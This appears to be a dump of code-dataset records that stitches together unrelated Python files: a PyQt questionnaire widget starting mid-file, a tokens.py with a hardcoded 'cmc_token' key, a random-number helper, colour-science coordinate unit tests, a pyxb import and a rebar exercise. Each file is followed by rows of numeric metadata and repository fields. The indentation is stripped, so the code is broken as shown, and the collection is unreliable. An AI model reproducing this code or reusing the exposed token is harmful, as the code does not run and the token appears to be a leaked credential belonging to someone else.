4: QtCore.Qt.Key_4, 5: QtCore.Qt.Key_5, 6: QtCore.Qt.Key_6, 7: QtCore.Qt.Key_7,
8: QtCore.Qt.Key_8, 9: QtCore.Qt.Key_9})
def __init__(self, next_action=None, finish_action=None, previous_action=None, back_action=None, answer_action=None,
**kwargs):
super().__init__(**kwargs)
if next_action is None:
self.next_action = self.default_next
else:
self.next_action = next_action
if finish_action is None:
self.finish_action = self.default_finish
else:
self.finish_action = finish_action
if previous_action is None:
self.previous_action = self.default_previous
else:
self.previous_action = previous_action
if back_action is None:
self.back_action = self.default_back
else:
self.back_action = back_action
if answer_action is None:
self.answer_action = self.default_answer
else:
self.answer_action = answer_action
self.ui = Ui_EmotionQuestionnaireImage()
self.ui.setupUi(self)
self.ui.continueButton.clicked.connect(self._continue)
self.ui.backButton.clicked.connect(self.previous)
self.continueAction = QAction("Continue", self)
self.continueAction.setShortcut(QKeySequence("Shift+Return"))
self.continueAction.triggered.connect(self._continue)
self.addAction(self.continueAction)
self._path = None
self.text = None
self.qa = []
self.answers = []
self.answer_key = bidict()
self.q_index = 0
self.multi_answers = 1
self.current_question = None
self.current_answers = None
self.current_color = None
self.selected_answer = ""
@property
def path(self):
return self._path
@path.setter
def path(self, value):
if isinstance(value, pathlib.Path) or value is None:
self._path = value
else:
self._path = pathlib.Path(value)
def load_file(self, file):
if file is not None:
self.path = file
if self.path.as_posix() != '.':
q_file = toml.load(self.path)
self.qa = q_file['Questions']
self.q_index = 0
qa = self.qa[self.q_index]
self.set_color(qa['color'])
self.set_question(qa['question'])
self.set_answers(qa['answers'], qa['format'])
if 'image' in qa:
self.set_image(pathlib.Path(qa['image']))
def set_image(self, file):
if file is not None:
pixmap = QtGui.QPixmap(file.as_posix())
repixmap = pixmap.scaledToHeight(480)
self.ui.image.setPixmap(repixmap)
self.current_image = file
def set_color(self, color):
if color is not None:
self.ui.colorSpacer.setStyleSheet('background-color:rgb(' + color + ')')
self.current_color = color
def set_question(self, question):
self.ui.questionBrowser.setText(question)
self.current_question = question
def set_answers(self, answers, _format=None):
self.remove_answers()
self.current_answers = answers
if _format == 'scale':
size = (1, len(answers))
else:
size = (2, -(-len(answers) // 2))
b_size = (size[0] + 2, size[1] + 2)
topSpacer = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
bottomSpacer = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
leftSpacer = QtWidgets.QSpacerItem(5, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
rightSpacer = QtWidgets.QSpacerItem(5, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.ui.answersLayout.addItem(topSpacer, 0, 0, 1, b_size[1])
self.ui.answersLayout.addItem(bottomSpacer, b_size[1], 0, 1, b_size[1])
self.ui.answersLayout.addItem(leftSpacer, 1, 0, size[1], 1)
self.ui.answersLayout.addItem(rightSpacer, 1, size[1] + 1, size[1], 1)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
font = QtGui.QFont()
font.setPointSize(18)
self.ui.answerChecks = []
for i in range(0, size[0]):
for j in range(0, size[1]):
a_index = i * size[1] + j
if a_index < len(answers):
answer_check = QtWidgets.QCheckBox(self.ui.answersBox)
sizePolicy.setHeightForWidth(answer_check.sizePolicy().hasHeightForWidth())
answer_check.setSizePolicy(sizePolicy)
answer_check.setFont(font)
answer_check.setObjectName('answer_check_' + str(a_index))
answer_check.setText(
QtWidgets.QApplication.translate("EmotionQuestionnaire", answers[a_index], None, -1))
answer_check.clicked.connect(self.generate_answer_function(answer_check))
self.ui.answerChecks.append(answer_check)
self.ui.answersLayout.addWidget(answer_check, i + 1, j + 1, 1, 1)
self.answer_key[answers[a_index]] = answer_check
def remove_answers(self):
self.answer_key.clear()
while not self.ui.answersLayout.isEmpty():
item = self.ui.answersLayout.takeAt(0)
if not item.isEmpty():
widget = item.widget()
widget.deleteLater()
del widget
self.ui.answersLayout.removeItem(item)
def generate_answer_function(self, answer_check):
return lambda v: self.answer_toggle(answer_check, v)
def answer_toggle(self, answer_check, value):
self.answer(answer_check, value)
if self.multi_answers > 0:
self.limit_answer(self.multi_answers, answer_check)
def answer(self, check_widget, value):
answer = self.answer_key.inverse[check_widget]
if answer is None:
answer = ""
self.selected_answer = answer
event = {'type_': 'Questionnaire_AnswerSelected', 'File': self.path.name,
'Question': self.current_question, 'Answer': answer, 'Value': value}
self.answer_action(event=event, caller=self)
def limit_answer(self, limit, last):
available = limit
other_answers = self.answer_key.copy()
other_answers.inverse.pop(last)
for answer in other_answers.values():
if answer.isChecked():
if available > 1:
available -= 1
else:
answer.setChecked(False)
def default_answer(self, event=None, caller=None):
pass
def keyPressEvent(self, event):
key = event.key()
if key in self.number_key.inverse:
number = self.number_key.inverse[key]
if number < len(self.current_answers):
check_widget = self.answer_key[self.current_answers[number]]
check_widget.setChecked(True)
self.answer_toggle(check_widget, True)
elif key == QtCore.Qt.Key_Enter or key == QtCore.Qt.Key_Return:
self._continue()
elif key == QtCore.Qt.Key_Backspace:
self.previous()
event.accept()
def _continue(self):
self.q_index += 1
event = {'type_': 'Questionnaire_AnswerConfirmed', 'File': self.path.name,
'Question': self.current_question, 'Answer': self.selected_answer}
if self.q_index < len(self.qa):
self.next_action(event=event, caller=self)
else:
self.finish_action(event=event, caller=self)
def default_next(self, event=None, caller=None):
if self.q_index < len(self.qa) - 1:
self.ui.continueButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Next", None, -1))
self.ui.backButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Previous", None, -1))
else:
self.ui.continueButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Done", None, -1))
self.ui.backButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Previous", None, -1))
qa = self.qa[self.q_index]
self.set_color(qa['color'])
self.set_question(qa['question'])
self.set_answers(qa['answers'], qa['format'])
if 'image' in qa:
self.set_image(pathlib.Path(qa['image']))
def default_finish(self, event=None, caller=None):
print("Not Connected")
def previous(self):
if self.q_index > 0:
self.q_index -= 1
event = {'type_': 'Questionnaire_AnswerRetracted', 'File': self.path.name,
'Question': self.qa[self.q_index]['question']}
self.previous_action(event=event, caller=self)
else:
event = {'type_': 'Questionnaire_Exited', 'File': self.path.name}
self.back_action(event=event, caller=self)
def default_previous(self, event=None, caller=None):
if self.q_index > 0:
self.ui.continueButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Next", None, -1))
self.ui.backButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Previous", None, -1))
else:
self.ui.continueButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Next", None, -1))
self.ui.backButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Exit", None, -1))
qa = self.qa[self.q_index]
self.set_color(qa['color'])
self.set_question(qa['question'])
self.set_answers(qa['answers'], qa['format'])
if 'image' in qa:
self.set_image(pathlib.Path(qa['image']))
def default_back(self, event=None, caller=None):
print('There is no going back')
class FinishWidget(QWidget):
def __init__(self):
super().__init__()
self._path = None
self.run_action = self.default_run
self.ui = Ui_EmotionFinish()
self.ui.setupUi(self)
self.text = None
@property
def path(self):
return self._path
@path.setter
def path(self, value):
if isinstance(value, pathlib.Path) or value is None:
self._path = value
else:
self._path = pathlib.Path(value)
def load_file(self, file):
if file is not None:
self.path = file
pixmap = QtGui.QPixmap(self.path.as_posix())
self.ui.imageSpace.setPixmap(pixmap)
def start(self):
event = {'type_': 'Finished'}
self.run_action(event=event, caller=self)
def default_run(self, event=None, caller=None):
print('finish')
class VideoPlayerWidget(QWidget):
def __init__(self, frame_action=None, finish_action=None, **kwargs):
super(VideoPlayerWidget, self).__init__(**kwargs)
if frame_action is None:
self.frame_action = self.default_frame
else:
self.frame_action = frame_action
if finish_action is None:
self.finish_action = self.default_finish
else:
self.finish_action = finish_action
self.ui = Ui_EmotionVideoPlayer()
self.ui.setupUi(self)
self.backgroundPalette = QtGui.QPalette()
self.backgroundPalette.setColor(QtGui.QPalette.Background, QtGui.QColor(0, 0, 0))
self.setAutoFillBackground(True)
self.setPalette(self.backgroundPalette)
self.ui.videoPlayer = QtMultimediaWidgets.QVideoWidget()
self.ui.gridLayout.addWidget(self.ui.videoPlayer, 1, 1, 1, 1)
self.mediaPlayer = QtMultimedia.QMediaPlayer(self, QtMultimedia.QMediaPlayer.VideoSurface)
self.video_item = QtMultimediaWidgets.QGraphicsVideoItem()
self.mediaPlayer.setVideoOutput(self.ui.videoPlayer)
self.mediaPlayer.mediaStatusChanged.connect(self.status_check)
self.frameProbe = QtMultimedia.QVideoProbe(self)
# self.frameProbe.videoFrameProbed.connect(self.frame)
self.frameProbe.setSource(self.mediaPlayer)
self.frame_number = 0
self.video = None
def set_video(self, video):
self.video = video
if isinstance(video, pathlib.Path) or isinstance(video, str):
video = QtCore.QUrl.fromLocalFile(str(video))
if isinstance(video, QtCore.QUrl):
video = QtMultimedia.QMediaContent(video)
self.mediaPlayer.setMedia(video)
self.frame_number = 0
def play(self):
self.mediaPlayer.play()
def frame(self, frame):
self.frame_number += 1
event = {'type_': 'Video_Frame', 'Video': self.video.name, 'FrameNumber': self.frame_number}
self.frame_action(frame, self.frame_number, event=event, caller=self)
def default_frame(self, frame=None, number=None, event=None, caller=None):
print(QtCore.QTime.currentTime().toString("hh:mm:ss.zzzz"))
def status_check(self, status):
if status == QtMultimedia.QMediaPlayer.EndOfMedia:
self.finish()
def finish(self):
self.mediaPlayer.stop()
self.mediaPlayer.setMedia(self.mediaPlayer.media())
event = {'type_': 'Video_Finished', 'Video': self.video.as_posix()}
self.finish_action(event=event, caller=self)
def default_finish(self, event=None, caller=None):
print("Done!")
| 39.228045 | 120 | 0.628417 | 3,178 | 27,695 | 5.314349 | 0.093455 | 0.025224 | 0.016934 | 0.039434 | 0.770205 | 0.755995 | 0.743146 | 0.731719 | 0.73012 | 0.720232 | 0 | 0.010624 | 0.259072 | 27,695 | 705 | 121 | 39.283688 | 0.812427 | 0.00733 | 0 | 0.758974 | 0 | 0 | 0.056203 | 0.00779 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117949 | false | 0.003419 | 0.025641 | 0.008547 | 0.167521 | 0.015385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6bec6dace899a4325650b34f647fce83936172d | 50 | py | Python | bot/tokens.py | mukoedo1993/webster_python_bot | 73cf76f368bf4705c2c61df967039b3ce66c3928 | [
"MIT"
] | null | null | null | bot/tokens.py | mukoedo1993/webster_python_bot | 73cf76f368bf4705c2c61df967039b3ce66c3928 | [
"MIT"
] | null | null | null | bot/tokens.py | mukoedo1993/webster_python_bot | 73cf76f368bf4705c2c61df967039b3ce66c3928 | [
"MIT"
] | null | null | null | cmc_token = 'abf9d4f1-8beb-4fa4-925c-a8910fb521e6' | 50 | 50 | 0.82 | 7 | 50 | 5.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.354167 | 0.04 | 50 | 1 | 50 | 50 | 0.479167 | 0 | 0 | 0 | 0 | 0 | 0.705882 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6c0ed3417e88ca505902480f0e2a58a76af5029 | 151 | py | Python | file_duplicator/common/generator/number_generator.py | alexeby/VidlyAPINode | 5f88ac1544b6687936c0acacb52a9c65f1be0237 | [
"Info-ZIP"
] | null | null | null | file_duplicator/common/generator/number_generator.py | alexeby/VidlyAPINode | 5f88ac1544b6687936c0acacb52a9c65f1be0237 | [
"Info-ZIP"
] | null | null | null | file_duplicator/common/generator/number_generator.py | alexeby/VidlyAPINode | 5f88ac1544b6687936c0acacb52a9c65f1be0237 | [
"Info-ZIP"
] | null | null | null | import random
def get_random_num_range(x: int, y: int):
return random.randint(x, y)
def get_random_num():
return int(random.random()*10)
| 12.583333 | 41 | 0.688742 | 25 | 151 | 3.96 | 0.48 | 0.121212 | 0.242424 | 0.30303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01626 | 0.18543 | 151 | 11 | 42 | 13.727273 | 0.788618 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
e6c15b1c3eab39c19a3725d207497577905da0bd | 12,953 | py | Python | colour/algebra/coordinates/tests/test_transformations.py | tjdcs/colour | 09413da71b5da57408eb812797c5db1300d4791a | [
"BSD-3-Clause"
] | null | null | null | colour/algebra/coordinates/tests/test_transformations.py | tjdcs/colour | 09413da71b5da57408eb812797c5db1300d4791a | [
"BSD-3-Clause"
] | null | null | null | colour/algebra/coordinates/tests/test_transformations.py | tjdcs/colour | 09413da71b5da57408eb812797c5db1300d4791a | [
"BSD-3-Clause"
] | null | null | null | """
Define the unit tests for the
:mod:`colour.algebra.coordinates.transformations` module.
"""
import numpy as np
import unittest
from itertools import product
from colour.algebra import (
cartesian_to_spherical,
spherical_to_cartesian,
cartesian_to_polar,
polar_to_cartesian,
cartesian_to_cylindrical,
cylindrical_to_cartesian,
)
from colour.utilities import ignore_numpy_errors
__author__ = "Colour Developers"
__copyright__ = "Copyright 2013 Colour Developers"
__license__ = "New BSD License - https://opensource.org/licenses/BSD-3-Clause"
__maintainer__ = "Colour Developers"
__email__ = "colour-developers@colour-science.org"
__status__ = "Production"
__all__ = [
"TestCartesianToSpherical",
"TestSphericalToCartesian",
"TestCartesianToPolar",
"TestPolarToCartesian",
"TestCartesianToCylindrical",
"TestCylindricalToCartesian",
]
class TestCartesianToSpherical(unittest.TestCase):
"""
Define :func:`colour.algebra.coordinates.transformations.\
cartesian_to_spherical` definition unit tests methods.
"""
def test_cartesian_to_spherical(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_spherical` definition.
"""
np.testing.assert_almost_equal(
cartesian_to_spherical(np.array([3, 1, 6])),
np.array([6.78232998, 0.48504979, 0.32175055]),
decimal=7,
)
np.testing.assert_almost_equal(
cartesian_to_spherical(np.array([-1, 9, 16])),
np.array([18.38477631, 0.51501513, 1.68145355]),
decimal=7,
)
np.testing.assert_almost_equal(
cartesian_to_spherical(np.array([6.3434, -0.9345, 18.5675])),
np.array([19.64342307, 0.33250603, -0.14626640]),
decimal=7,
)
def test_n_dimensional_cartesian_to_spherical(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_spherical` definition n-dimensional arrays support.
"""
a_i = np.array([3, 1, 6])
a_o = cartesian_to_spherical(a_i)
a_i = np.tile(a_i, (6, 1))
a_o = np.tile(a_o, (6, 1))
np.testing.assert_almost_equal(
cartesian_to_spherical(a_i), a_o, decimal=7
)
a_i = np.reshape(a_i, (2, 3, 3))
a_o = np.reshape(a_o, (2, 3, 3))
np.testing.assert_almost_equal(
cartesian_to_spherical(a_i), a_o, decimal=7
)
@ignore_numpy_errors
def test_nan_cartesian_to_spherical(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_spherical` definition nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = np.array(list(set(product(cases, repeat=3))))
cartesian_to_spherical(cases)
class TestSphericalToCartesian(unittest.TestCase):
"""
Define :func:`colour.algebra.coordinates.transformations.\
spherical_to_cartesian` definition unit tests methods.
"""
def test_spherical_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
spherical_to_cartesian` definition.
"""
np.testing.assert_almost_equal(
spherical_to_cartesian(
np.array([6.78232998, 0.48504979, 0.32175055])
),
np.array([3.00000000, 0.99999999, 6.00000000]),
decimal=7,
)
np.testing.assert_almost_equal(
spherical_to_cartesian(
np.array([18.38477631, 0.51501513, 1.68145355])
),
np.array([-1.00000003, 9.00000007, 15.99999996]),
decimal=7,
)
np.testing.assert_almost_equal(
spherical_to_cartesian(
np.array([19.64342307, 0.33250603, -0.14626640])
),
np.array([6.34339996, -0.93449999, 18.56750001]),
decimal=7,
)
def test_n_dimensional_spherical_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
spherical_to_cartesian` definition n-dimensional arrays support.
"""
a_i = np.array([6.78232998, 0.48504979, 0.32175055])
a_o = spherical_to_cartesian(a_i)
a_i = np.tile(a_i, (6, 1))
a_o = np.tile(a_o, (6, 1))
np.testing.assert_almost_equal(
spherical_to_cartesian(a_i), a_o, decimal=7
)
a_i = np.reshape(a_i, (2, 3, 3))
a_o = np.reshape(a_o, (2, 3, 3))
np.testing.assert_almost_equal(
spherical_to_cartesian(a_i), a_o, decimal=7
)
@ignore_numpy_errors
def test_nan_spherical_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
spherical_to_cartesian` definition nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = np.array(list(set(product(cases, repeat=3))))
spherical_to_cartesian(cases)
class TestCartesianToPolar(unittest.TestCase):
"""
Define :func:`colour.algebra.coordinates.transformations.\
cartesian_to_polar` definition unit tests methods.
"""
def test_cartesian_to_polar(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_polar` definition.
"""
np.testing.assert_almost_equal(
cartesian_to_polar(np.array([3, 1])),
np.array([3.16227766, 0.32175055]),
decimal=7,
)
np.testing.assert_almost_equal(
cartesian_to_polar(np.array([-1, 9])),
np.array([9.05538514, 1.68145355]),
decimal=7,
)
np.testing.assert_almost_equal(
cartesian_to_polar(np.array([6.3434, -0.9345])),
np.array([6.41186508, -0.14626640]),
decimal=7,
)
def test_n_dimensional_cartesian_to_polar(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_polar` definition n-dimensional arrays support.
"""
a_i = np.array([3, 1])
a_o = cartesian_to_polar(a_i)
a_i = np.tile(a_i, (6, 1))
a_o = np.tile(a_o, (6, 1))
np.testing.assert_almost_equal(cartesian_to_polar(a_i), a_o, decimal=7)
a_i = np.reshape(a_i, (2, 3, 2))
a_o = np.reshape(a_o, (2, 3, 2))
np.testing.assert_almost_equal(cartesian_to_polar(a_i), a_o, decimal=7)
@ignore_numpy_errors
def test_nan_cartesian_to_polar(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_polar` definition nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = np.array(list(set(product(cases, repeat=2))))
cartesian_to_polar(cases)
class TestPolarToCartesian(unittest.TestCase):
"""
Define :func:`colour.algebra.coordinates.transformations.\
polar_to_cartesian` definition unit tests methods.
"""
def test_polar_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
polar_to_cartesian` definition.
"""
np.testing.assert_almost_equal(
polar_to_cartesian(np.array([0.32175055, 1.08574654])),
np.array([0.15001697, 0.28463718]),
decimal=7,
)
np.testing.assert_almost_equal(
polar_to_cartesian(np.array([1.68145355, 1.05578119])),
np.array([0.82819662, 1.46334425]),
decimal=7,
)
np.testing.assert_almost_equal(
polar_to_cartesian(np.array([-0.14626640, 1.23829030])),
np.array([-0.04774323, -0.13825500]),
decimal=7,
)
def test_n_dimensional_polar_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
polar_to_cartesian` definition n-dimensional arrays support.
"""
a_i = np.array([3.16227766, 0.32175055])
a_o = polar_to_cartesian(a_i)
a_i = np.tile(a_i, (6, 1))
a_o = np.tile(a_o, (6, 1))
np.testing.assert_almost_equal(polar_to_cartesian(a_i), a_o, decimal=7)
a_i = np.reshape(a_i, (2, 3, 2))
a_o = np.reshape(a_o, (2, 3, 2))
np.testing.assert_almost_equal(polar_to_cartesian(a_i), a_o, decimal=7)
@ignore_numpy_errors
def test_nan_polar_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
polar_to_cartesian` definition nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = np.array(list(set(product(cases, repeat=2))))
polar_to_cartesian(cases)
class TestCartesianToCylindrical(unittest.TestCase):
"""
Define :func:`colour.algebra.coordinates.transformations.\
cartesian_to_cylindrical` definition unit tests methods.
"""
def test_cartesian_to_cylindrical(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_cylindrical` definition.
"""
np.testing.assert_almost_equal(
cartesian_to_cylindrical(np.array([3, 1, 6])),
np.array([3.16227766, 0.32175055, 6.00000000]),
decimal=7,
)
np.testing.assert_almost_equal(
cartesian_to_cylindrical(np.array([-1, 9, 16])),
np.array([9.05538514, 1.68145355, 16.00000000]),
decimal=7,
)
np.testing.assert_almost_equal(
cartesian_to_cylindrical(np.array([6.3434, -0.9345, 18.5675])),
np.array([6.41186508, -0.14626640, 18.56750000]),
decimal=7,
)
def test_n_dimensional_cartesian_to_cylindrical(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_cylindrical` definition n-dimensional arrays support.
"""
a_i = np.array([3, 1, 6])
a_o = cartesian_to_cylindrical(a_i)
a_i = np.tile(a_i, (6, 1))
a_o = np.tile(a_o, (6, 1))
np.testing.assert_almost_equal(
cartesian_to_cylindrical(a_i), a_o, decimal=7
)
a_i = np.reshape(a_i, (2, 3, 3))
a_o = np.reshape(a_o, (2, 3, 3))
np.testing.assert_almost_equal(
cartesian_to_cylindrical(a_i), a_o, decimal=7
)
@ignore_numpy_errors
def test_nan_cartesian_to_cylindrical(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cartesian_to_cylindrical` definition nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = np.array(list(set(product(cases, repeat=3))))
cartesian_to_cylindrical(cases)
class TestCylindricalToCartesian(unittest.TestCase):
"""
Define :func:`colour.algebra.coordinates.transformations.\
cylindrical_to_cartesian` definition unit tests methods.
"""
def test_cylindrical_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cylindrical_to_cartesian` definition.
"""
np.testing.assert_almost_equal(
cylindrical_to_cartesian(
np.array([0.32175055, 1.08574654, 6.78232998])
),
np.array([0.15001697, 0.28463718, 6.78232998]),
decimal=7,
)
np.testing.assert_almost_equal(
cylindrical_to_cartesian(
np.array([1.68145355, 1.05578119, 18.38477631])
),
np.array([0.82819662, 1.46334425, 18.38477631]),
decimal=7,
)
np.testing.assert_almost_equal(
cylindrical_to_cartesian(
np.array([-0.14626640, 1.23829030, 19.64342307])
),
np.array([-0.04774323, -0.13825500, 19.64342307]),
decimal=7,
)
def test_n_dimensional_cylindrical_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cylindrical_to_cartesian` definition n-dimensional arrays support.
"""
a_i = np.array([3.16227766, 0.32175055, 6.00000000])
a_o = cylindrical_to_cartesian(a_i)
a_i = np.tile(a_i, (6, 1))
a_o = np.tile(a_o, (6, 1))
np.testing.assert_almost_equal(
cylindrical_to_cartesian(a_i), a_o, decimal=7
)
a_i = np.reshape(a_i, (2, 3, 3))
a_o = np.reshape(a_o, (2, 3, 3))
np.testing.assert_almost_equal(
cylindrical_to_cartesian(a_i), a_o, decimal=7
)
@ignore_numpy_errors
def test_nan_cylindrical_to_cartesian(self):
"""
Test :func:`colour.algebra.coordinates.transformations.\
cylindrical_to_cartesian` definition nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = np.array(list(set(product(cases, repeat=3))))
cylindrical_to_cartesian(cases)
if __name__ == "__main__":
unittest.main()
| 30.767221 | 79 | 0.617463 | 1,601 | 12,953 | 4.73579 | 0.079325 | 0.044315 | 0.059351 | 0.083092 | 0.849776 | 0.849776 | 0.798866 | 0.796096 | 0.723688 | 0.686494 | 0 | 0.097219 | 0.255925 | 12,953 | 420 | 80 | 30.840476 | 0.689458 | 0.20281 | 0 | 0.46281 | 0 | 0 | 0.032972 | 0.013926 | 0 | 0 | 0 | 0 | 0.123967 | 1 | 0.07438 | false | 0 | 0.020661 | 0 | 0.119835 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6e7814d9ad37a6e28c1c5d827a2c06c4e67e116 | 45 | py | Python | dev/Tools/Python/2.7.13/mac/Python.framework/Versions/2.7/lib/python2.7/site-packages/pyxb/bundles/wssplat/wsoap.py | jeikabu/lumberyard | 07228c605ce16cbf5aaa209a94a3cb9d6c1a4115 | [
"AML"
] | 123 | 2015-01-12T06:43:22.000Z | 2022-03-20T18:06:46.000Z | dev/Tools/Python/2.7.13/mac/Python.framework/Versions/2.7/lib/python2.7/site-packages/pyxb/bundles/wssplat/wsoap.py | jeikabu/lumberyard | 07228c605ce16cbf5aaa209a94a3cb9d6c1a4115 | [
"AML"
] | 103 | 2015-01-08T18:35:57.000Z | 2022-01-18T01:44:14.000Z | dev/Tools/Python/2.7.13/mac/Python.framework/Versions/2.7/lib/python2.7/site-packages/pyxb/bundles/wssplat/wsoap.py | jeikabu/lumberyard | 07228c605ce16cbf5aaa209a94a3cb9d6c1a4115 | [
"AML"
] | 54 | 2015-02-15T17:12:00.000Z | 2022-03-07T23:02:32.000Z | from pyxb.bundles.wssplat.raw.wsoap import *
| 22.5 | 44 | 0.8 | 7 | 45 | 5.142857 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e6fa3475d775bfaed603460c90023aed6699c1eb | 1,182 | py | Python | exercicios_fixacao/lista04/repet_lim_ex5.py | PauloVictorSS/unicamp-mc102 | 077ca3ea6d3df40ebe205c2e874d20a934ea5541 | [
"MIT"
] | null | null | null | exercicios_fixacao/lista04/repet_lim_ex5.py | PauloVictorSS/unicamp-mc102 | 077ca3ea6d3df40ebe205c2e874d20a934ea5541 | [
"MIT"
] | null | null | null | exercicios_fixacao/lista04/repet_lim_ex5.py | PauloVictorSS/unicamp-mc102 | 077ca3ea6d3df40ebe205c2e874d20a934ea5541 | [
"MIT"
] | null | null | null | rebar_size = int(input("Entre com o tamanho do vergalhão: "))
max_volume = int(input("Entre com o volume máximo da caixa: "))
total_possibilities = []
max_edge = rebar_size//4
x = 0
y = 0
z = 0
for x in range(1, max_edge):
possibilitie = []
if (x + y + z) == (max_edge):
if ((x * y * z) <= max_volume):
possibilitie.append(x)
possibilitie.append(y)
possibilitie.append(z)
total_possibilities.append(possibilitie)
for y in range(1, max_edge):
possibilitie = []
if (x + y + z) == (max_edge):
if ((x * y * z) <= max_volume):
possibilitie.append(x)
possibilitie.append(y)
possibilitie.append(z)
total_possibilities.append(possibilitie)
for z in range(1, max_edge):
possibilitie = []
if (x + y + z) == (max_edge):
if ((x * y * z) <= max_volume):
possibilitie.append(x)
possibilitie.append(y)
possibilitie.append(z)
total_possibilities.append(possibilitie)
print(total_possibilities) | 26.266667 | 63 | 0.525381 | 136 | 1,182 | 4.433824 | 0.227941 | 0.268657 | 0.039801 | 0.049751 | 0.792703 | 0.736318 | 0.736318 | 0.736318 | 0.736318 | 0.736318 | 0 | 0.009223 | 0.357868 | 1,182 | 45 | 64 | 26.266667 | 0.785244 | 0 | 0 | 0.65625 | 0 | 0 | 0.059172 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.03125 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
